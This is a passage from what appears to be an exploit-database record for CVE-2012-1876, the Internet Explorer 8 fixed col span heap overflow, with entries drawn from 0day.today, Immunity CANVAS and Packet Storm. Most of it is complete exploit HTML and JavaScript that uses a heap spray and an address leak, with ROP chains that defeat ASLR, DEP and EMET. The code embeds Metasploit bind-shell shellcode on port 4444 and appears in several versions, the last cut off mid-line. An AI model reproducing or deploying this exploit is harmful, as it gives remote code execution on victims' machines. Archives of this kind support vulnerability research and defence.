rop.toString(16);\r\n var rop31 = rop.substring(4,8);\r\n var rop32 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2140694; // ADD EAX,ECX\r\n var rop = rop.toString(16);\r\n var rop33 = 
rop.substring(4,8);\r\n var rop34 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX\r\n var rop = rop.toString(16);\r\n var rop35 = rop.substring(4,8);\r\n var rop36 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 5036248; // ADD ESP,0C\r\n var rop = rop.toString(16);\r\n var rop37 = rop.substring(4,8);\r\n var rop38 = rop.substring(0,4); // } RET\r\n \r\n var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW\r\n var getmodulew = getmodulew.toString(16);\r\n var getmodulew1 = getmodulew.substring(4,8);\r\n var getmodulew2 = getmodulew.substring(0,4); // } RET\r\n \r\n var getprocaddr = cbuttonlayout + 4836; // GetProcAddress\r\n var getprocaddr = getprocaddr.toString(16);\r\n var getprocaddr1 = getprocaddr.substring(4,8);\r\n var getprocaddr2 = getprocaddr.substring(0,4); // } RET\r\n \r\n var shellcode = unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\r\n shellcode+= unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\r\n shellcode+= unescape(\"%u4141%u4141\"); // PADDING\r\n \r\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\r\n shellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN\r\n \r\n // EMET disable part 0x01\r\n // Implement the Tachyon detection grid to overcome the Romulan cloaking device.\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u1024%u076d\"); // EMET string\r\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\r\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW\r\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\r\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u1024%u076d\"); // EMET string\r\n 
shellcode+= unescape(\"%ue220%u0007\"); // EMET offset\r\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u0000%u0000\"); // Zero out ECX\r\n shellcode+= unescape(\"%u\"+rop35+\"%u\"+rop36); // MOV DWORD PTR [EAX],ECX # RETN\r\n shellcode+= unescape(\"%u\"+rop37+\"%u\"+rop38); // ADD ESP,0C # RETN\r\n shellcode+= \"EMET\"; // EMET string\r\n shellcode+= unescape(\"%u0000%u0000\"); // EMET string\r\n // EMET disable part 0x01 end\r\n \r\n // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\r\n shellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBP\r\n shellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024\r\n shellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX\r\n shellcode+= unescape(\"%u0040%u0000\"); // 0x00000040\r\n shellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX\r\n shellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location\r\n shellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI\r\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET\r\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\r\n shellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2); // JMP EAX\r\n shellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX\r\n shellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect()\r\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD\r\n shellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n \r\n // EMET disable part 0x02\r\n // Execute the Corbomite bluff to disarm EAF\r\n shellcode+= unescape(\"%uc8b8%u6d10\");\r\n shellcode+= unescape(\"%u8b07%u8b00\");\r\n shellcode+= 
unescape(\"%u6800%u10d0\");\r\n shellcode+= unescape(\"%u076d%ud0ff\");\r\n shellcode+= unescape(\"%udc68%u6d10\");\r\n shellcode+= unescape(\"%u5007%uccb8\");\r\n shellcode+= unescape(\"%u6d10%u8b07\");\r\n shellcode+= unescape(\"%u8b00%uff00\");\r\n shellcode+= unescape(\"%u8bd0%u81f0\");\r\n shellcode+= unescape(\"%uccec%u0002\");\r\n shellcode+= unescape(\"%uc700%u2404\");\r\n shellcode+= unescape(\"%u0010%u0001\");\r\n shellcode+= unescape(\"%ufc8b%uccb9\");\r\n shellcode+= unescape(\"%u0002%u8300\");\r\n shellcode+= unescape(\"%u04c7%ue983\");\r\n shellcode+= unescape(\"%u3304%uf3c0\");\r\n shellcode+= unescape(\"%u54aa%ufe6a\");\r\n shellcode+= unescape(\"%ud6ff%u9090\");\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u29eb\"); // NOPs\r\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW\r\n shellcode+= unescape(\"%u\"+getprocaddr1+\"%u\"+getprocaddr2); // GetProcAddress\r\n shellcode+= \"NTDLL\";\r\n shellcode+= unescape(\"%u0000\");\r\n shellcode+= unescape(\"%u744e%u6553\"); // NtSetContextThread\r\n shellcode+= unescape(\"%u4374%u6e6f\");\r\n shellcode+= unescape(\"%u6574%u7478\");\r\n shellcode+= unescape(\"%u6854%u6572\");\r\n shellcode+= unescape(\"%u6461%u0000\");\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n // EMET disable part 0x02 end\r\n \r\n // Bind shellcode on 4444 :)\r\n // msf > generate -t js_le\r\n // windows/shell_bind_tcp - 342 bytes\r\n // http://www.metasploit.com\r\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\r\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\r\n // I would keep the shellcode the same size for better reliability :)\r\n \r\n shellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" +\r\n \"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" +\r\n \"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" +\r\n \"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" +\r\n 
\"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" +\r\n \"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" +\r\n \"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" +\r\n \"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" +\r\n \"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" +\r\n \"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" +\r\n \"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" +\r\n \"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" +\r\n \"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" +\r\n \"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" +\r\n \"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" +\r\n \"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" +\r\n \"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" +\r\n \"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" +\r\n \"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" +\r\n \"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" +\r\n \"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" +\r\n \"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" +\r\n \"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" +\r\n \"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" +\r\n \"%u006a%uff53%u41d5\");\r\n \r\n // Total spray should be 1000\r\n var padding = unescape(\"%u9090\");\r\n while (padding.length < 1000)\r\n padding = padding + padding;\r\n var padding = padding.substr(0, 1000 - shellcode.length);\r\n \r\n shellcode+= padding;\r\n \r\n while (shellcode.length < 100000)\r\n shellcode = shellcode + shellcode;\r\n \r\n var onemeg = shellcode.substr(0, 64*1024/2);\r\n \r\n for (i=0; i<14; i++) {\r\n onemeg += shellcode.substr(0, 64*1024/2);\r\n }\r\n \r\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\r\n \r\n var spray = new Array();\r\n \r\n for (i=0; i<100; i++) {\r\n spray[i] = onemeg.substr(0, onemeg.length);\r\n }\r\n}\r\n \r\nfunction leak(){\r\n var leak_col = document.getElementById(\"132\");\r\n leak_col.width = \"41\";\r\n leak_col.span = \"19\";\r\n}\r\n \r\nfunction get_leak() {\r\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\r\n str_addr = 
str_addr - 1410704;\r\n var hex = str_addr.toString(16);\r\n //alert(hex);\r\n setTimeout(function(){heapspray(str_addr)}, 50);\r\n}\r\n \r\nfunction trigger_overflow(){\r\n var evil_col = document.getElementById(\"132\");\r\n evil_col.width = \"1245880\";\r\n evil_col.span = \"44\";\r\n}\r\n \r\nsetTimeout(function(){leak()}, 400);\r\nsetTimeout(function(){get_leak()},450);\r\nsetTimeout(function(){trigger_overflow()}, 700);\r\n \r\n</script>\r\n</body>\r\n</html>\n\n# 0day.today [2018-01-03] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22396"}], "canvas": [{"lastseen": "2019-05-29T19:48:25", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "edition": 2, "description": "**Name**| ms12_037 \n---|--- \n**CVE**| CVE-2012-1876 \n**Exploit Pack**| [CANVAS](<http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| MS12-037 Microsoft Internet Explorer Fixed Table Col Span Heap Overflow \n**Notes**| CVE Name: CVE-2012-1876 \nVENDOR: Microsoft \nNotes: \nSome information regarding this exploit: \n\\- It uses an information leak, so it does not depend on third-party software. \n\\- It works with js_recon \n\\- It only works if the template is set as the exploit itself \n \nTested on: \n* Windows XP Professional SP3 English with Internet Explorer 8 \n* Windows 7 English / Internet Explorer 8. \n \nTested on the following mshtml.dll versions: \n* v80760016625 - unpatched install \n* v80760117514 - some patches \n* v90811216447 - all patches except for the MS12-037 patch \n \n**Important** Do not use a template other than the exploit itself! 
\n \nVersionsAffected: Internet Explorer 6/7/8/9 \nRepeatability: \nMSADV: MS12-037 \nReferences: http://technet.microsoft.com/en-us/security/bulletin/ms12-037 \nCVE Url: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1876 \nDate public: 06/12/2012 \nCVSS: 9.5 \n\n", "modified": "2012-06-12T22:55:00", "published": "2012-06-12T22:55:00", "id": "MS12_037", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms12_037", "type": "canvas", "title": "Immunity Canvas: MS12_037", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:14:47", "description": "", "published": "2013-01-11T00:00:00", "type": "packetstorm", "title": "Internet Explorer 8 Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2013-01-11T00:00:00", "id": "PACKETSTORM:119467", "href": "https://packetstormsecurity.com/files/119467/Internet-Explorer-8-Heap-Overflow.html", "sourceData": "`<!-- \n** Exploit Title: Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass \n** Author: sickness@offsec.com \n** Thanks to Ryujin and Dookie for their help. 
\n \n#################################################################### \n \n** Affected Software: Internet Explorer 8 \n** Vulnerability: Fixed Col Span ID \n** CVE: CVE-2012-1876 \n** Metasploit exploit using NON-ASLR DLL: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_037_ie_colspan.rb \n** Vupen Blog post: http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php \n** Tested on Windows 7 (x86) - IE 8.0.7601.17514 \n \n#################################################################### \n \n** The exploit bypasses ASLR without the need of any NON-ASLR dll's using a leak :) \n** To get it working on a different version of Windows you will need to make your own changes to the exploit (the gadget offsets below are specific to this mshtml.dll build) :) \n** Have fun :) \n--> \n \n<html> \n<body> \n<div id=\"evil\"></div> \n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" > </col></table> \n<script language='javascript'> \n \nfunction strtoint(str) { \nreturn str.charCodeAt(1)*0x10000 + str.charCodeAt(0); \n} \n \nvar free = \"EEEE\"; \nwhile ( free.length < 500 ) free += free; \n \nvar string1 = \"AAAA\"; \nwhile ( string1.length < 500 ) string1 += string1; \n \nvar string2 = \"BBBB\"; \nwhile ( string2.length < 500 ) string2 += string2; \n \nvar fr = new Array(); \nvar al = new Array(); \nvar bl = new Array(); \n \nvar div_container = document.getElementById(\"evil\"); \ndiv_container.style.cssText = \"display:none\"; \n \nfor (var i=0; i < 500; i+=2) { \nfr[i] = free.substring(0, (0x100-6)/2); \nal[i] = string1.substring(0, (0x100-6)/2); \nbl[i] = string2.substring(0, (0x100-6)/2); \nvar obj = document.createElement(\"button\"); \ndiv_container.appendChild(obj); \n} \n \nfor (var i=200; i<500; i+=2 ) { \nfr[i] = null; \nCollectGarbage(); \n} \n \nfunction heapspray(cbuttonlayout) { \nCollectGarbage(); \nvar rop = cbuttonlayout + 4161; // RET \nvar rop = rop.toString(16); \nvar rop1 = 
rop.substring(4,8); \nvar rop2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 11360; // POP EBP \nvar rop = rop.toString(16); \nvar rop3 = rop.substring(4,8); \nvar rop4 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 111675; // XCHG EAX,ESP \nvar rop = rop.toString(16); \nvar rop5 = rop.substring(4,8); \nvar rop6 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12377; // POP EBX \nvar rop = rop.toString(16); \nvar rop7 = rop.substring(4,8); \nvar rop8 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 642768; // POP EDX \nvar rop = rop.toString(16); \nvar rop9 = rop.substring(4,8); \nvar rop10 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12201; // POP ECX --> Changed \nvar rop = rop.toString(16); \nvar rop11 = rop.substring(4,8); \nvar rop12 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 5504544; // Writable location \nvar rop = rop.toString(16); \nvar writable1 = rop.substring(4,8); \nvar writable2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12462; // POP EDI \nvar rop = rop.toString(16); \nvar rop13 = rop.substring(4,8); \nvar rop14 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12043; // POP ESI --> changed \nvar rop = rop.toString(16); \nvar rop15 = rop.substring(4,8); \nvar rop16 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 63776; // JMP EAX \nvar rop = rop.toString(16); \nvar jmpeax1 = rop.substring(4,8); \nvar jmpeax2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 85751; // POP EAX \nvar rop = rop.toString(16); \nvar rop17 = rop.substring(4,8); \nvar rop18 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 4936; // VirtualProtect() \nvar rop = rop.toString(16); \nvar vp1 = rop.substring(4,8); \nvar vp2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX] \nvar rop = rop.toString(16); \nvar rop19 = rop.substring(4,8); \nvar rop20 = rop.substring(0,4); // 
} RET \n \nvar rop = cbuttonlayout + 234657; // PUSHAD \nvar rop = rop.toString(16); \nvar rop21 = rop.substring(4,8); \nvar rop22 = rop.substring(0,4); // } RET \n \n \nvar rop = cbuttonlayout + 408958; // PUSH ESP \nvar rop = rop.toString(16); \nvar rop23 = rop.substring(4,8); \nvar rop24 = rop.substring(0,4); // } RET \n \nvar shellcode = unescape(\"%u\"+rop1+\"%u\"+rop2); // RET \nshellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP \nshellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP \nshellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP \nshellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP \nshellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBP \nshellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024 \nshellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX \nshellcode+= unescape(\"%u0040%u0000\"); // 0x00000040 \nshellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX \nshellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location \nshellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI \nshellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET \nshellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI \nshellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2); // JMP EAX \nshellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX \nshellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect() \nshellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX] \nshellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD \nshellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP \nshellcode+= unescape(\"%u9090%u9090\"); // crap \nshellcode+= unescape(\"%u9090%u9090\"); // crap \n \n// Bind shellcode on 4444 :) \nshellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" + \n\"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" + \n\"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" + \n\"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" + \n\"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" 
+ \n\"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" + \n\"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" + \n\"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" + \n\"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" + \n\"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" + \n\"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" + \n\"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" + \n\"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" + \n\"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" + \n\"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" + \n\"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" + \n\"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" + \n\"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" + \n\"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" + \n\"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" + \n\"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" + \n\"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" + \n\"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" + \n\"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" + \n\"%u006a%uff53%u41d5\"); \n \n \n \nwhile (shellcode.length < 100000) \nshellcode = shellcode + shellcode; \n \nvar onemeg = shellcode.substr(0, 64*1024/2); \n \nfor (i=0; i<14; i++) { \nonemeg += shellcode.substr(0, 64*1024/2); \n} \n \nonemeg += shellcode.substr(0, (64*1024/2)-(38/2)); \n \nvar spray = new Array(); \n \nfor (i=0; i<100; i++) { \nspray[i] = onemeg.substr(0, onemeg.length); \n} \n} \n \nfunction leak(){ \nvar leak_col = document.getElementById(\"132\"); \nleak_col.width = \"41\"; \nleak_col.span = \"19\"; \n} \n \nfunction get_leak() { \nvar str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13)); \nstr_addr = str_addr - 1410704; \nsetTimeout(function(){heapspray(str_addr)}, 200); \n} \n \nfunction trigger_overflow(){ \nvar evil_col = document.getElementById(\"132\"); \nevil_col.width = \"1178993\"; \nevil_col.span = \"44\"; \n} \n \nsetTimeout(function(){leak()}, 300); \nsetTimeout(function(){get_leak()},700); \n//setTimeout(function(){heapspray()}, 900); 
\nsetTimeout(function(){trigger_overflow()}, 1200); \n \n</script> \n</body> \n</html> \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/119467/ie8fixedcol-overflow.txt"}, {"lastseen": "2016-12-05T22:21:07", "description": "", "published": "2014-07-01T00:00:00", "type": "packetstorm", "title": "Internet Explorer 8 Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2014-07-01T00:00:00", "id": "PACKETSTORM:127316", "href": "https://packetstormsecurity.com/files/127316/Internet-Explorer-8-Bypass.html", "sourceData": "`<!-- \n** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 4.1.X bypass \n** Offensive Security Research Team \n** http://www.offensive-security.com/vulndev/disarming-enhanced-mitigation-experience-toolkit-emet \n** Affected Software: Internet Explorer 8 \n** Vulnerability: Fixed Col Span ID \n** CVE: CVE-2012-1876 \n** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 4.1.X \n--> \n \n<html> \n<body> \n<div id=\"evil\"></div> \n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" > </col></table> \n<script language='javascript'> \n \nfunction strtoint(str) { \nreturn str.charCodeAt(1)*0x10000 + str.charCodeAt(0); \n} \n \nvar free = \"EEEE\"; \nwhile ( free.length < 500 ) free += free; \n \nvar string1 = \"AAAA\"; \nwhile ( string1.length < 500 ) string1 += string1; \n \nvar string2 = \"BBBB\"; \nwhile ( string2.length < 500 ) string2 += string2; \n \nvar fr = new Array(); \nvar al = new Array(); \nvar bl = new Array(); \n \nvar div_container = document.getElementById(\"evil\"); \ndiv_container.style.cssText = \"display:none\"; \n \nfor (var i=0; i < 500; i+=2) { \nfr[i] = free.substring(0, (0x100-6)/2); \nal[i] = string1.substring(0, (0x100-6)/2); \nbl[i] = string2.substring(0, (0x100-6)/2); \nvar obj = document.createElement(\"button\"); 
\ndiv_container.appendChild(obj); \n} \n \nfor (var i=200; i<500; i+=2 ) { \nfr[i] = null; \nCollectGarbage(); \n} \n \nfunction heapspray(cbuttonlayout) { \nCollectGarbage(); \nvar rop = cbuttonlayout + 4161; // RET \nvar rop = rop.toString(16); \nvar rop1 = rop.substring(4,8); \nvar rop2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 11360; // POP EBP \nvar rop = rop.toString(16); \nvar rop3 = rop.substring(4,8); \nvar rop4 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 111675; // XCHG EAX,ESP \nvar rop = rop.toString(16); \nvar rop5 = rop.substring(4,8); \nvar rop6 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12377; // POP EBX \nvar rop = rop.toString(16); \nvar rop7 = rop.substring(4,8); \nvar rop8 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 642768; // POP EDX \nvar rop = rop.toString(16); \nvar rop9 = rop.substring(4,8); \nvar rop10 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12201; // POP ECX --> Changed \nvar rop = rop.toString(16); \nvar rop11 = rop.substring(4,8); \nvar rop12 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 5504544; // Writable location \nvar rop = rop.toString(16); \nvar writable1 = rop.substring(4,8); \nvar writable2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12462; // POP EDI \nvar rop = rop.toString(16); \nvar rop13 = rop.substring(4,8); \nvar rop14 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12043; // POP ESI --> changed \nvar rop = rop.toString(16); \nvar rop15 = rop.substring(4,8); \nvar rop16 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 63776; // JMP EAX \nvar rop = rop.toString(16); \nvar jmpeax1 = rop.substring(4,8); \nvar jmpeax2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 85751; // POP EAX \nvar rop = rop.toString(16); \nvar rop17 = rop.substring(4,8); \nvar rop18 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 4936; // VirtualProtect() \nvar rop = 
rop.toString(16); \nvar vp1 = rop.substring(4,8); \nvar vp2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX] \nvar rop = rop.toString(16); \nvar rop19 = rop.substring(4,8); \nvar rop20 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 234657; // PUSHAD \nvar rop = rop.toString(16); \nvar rop21 = rop.substring(4,8); \nvar rop22 = rop.substring(0,4); // } RET \n \n \nvar rop = cbuttonlayout + 408958; // PUSH ESP \nvar rop = rop.toString(16); \nvar rop23 = rop.substring(4,8); \nvar rop24 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 2228408; // POP ECX \nvar rop = rop.toString(16); \nvar rop25 = rop.substring(4,8); \nvar rop26 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 1586172; // POP EAX \nvar rop = rop.toString(16); \nvar rop27 = rop.substring(4,8); \nvar rop28 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX] \nvar rop = rop.toString(16); \nvar rop29 = rop.substring(4,8); \nvar rop30 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 1884912; // PUSH EAX \nvar rop = rop.toString(16); \nvar rop31 = rop.substring(4,8); \nvar rop32 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 2140694; // ADD EAX,ECX \nvar rop = rop.toString(16); \nvar rop33 = rop.substring(4,8); \nvar rop34 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX \nvar rop = rop.toString(16); \nvar rop35 = rop.substring(4,8); \nvar rop36 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 5036248; // ADD ESP,0C \nvar rop = rop.toString(16); \nvar rop37 = rop.substring(4,8); \nvar rop38 = rop.substring(0,4); // } RET \n \nvar getmodulew = cbuttonlayout + 4840; // GetModuleHandleW \nvar getmodulew = getmodulew.toString(16); \nvar getmodulew1 = getmodulew.substring(4,8); \nvar getmodulew2 = getmodulew.substring(0,4); // } RET \n \nvar getprocaddr = cbuttonlayout + 4836; // 
GetProcAddress \nvar getprocaddr = getprocaddr.toString(16); \nvar getprocaddr1 = getprocaddr.substring(4,8); \nvar getprocaddr2 = getprocaddr.substring(0,4); // } RET \n \nvar shellcode = unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING \nshellcode+= unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING \nshellcode+= unescape(\"%u4141%u4141\"); // PADDING \n \nshellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN \nshellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN \nshellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN \n \n// EMET disable part 0x01 \n// Implement the Tachyon detection grid to overcome the Romulan cloaking device. \nshellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN \nshellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW \nshellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN \nshellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN \nshellcode+= 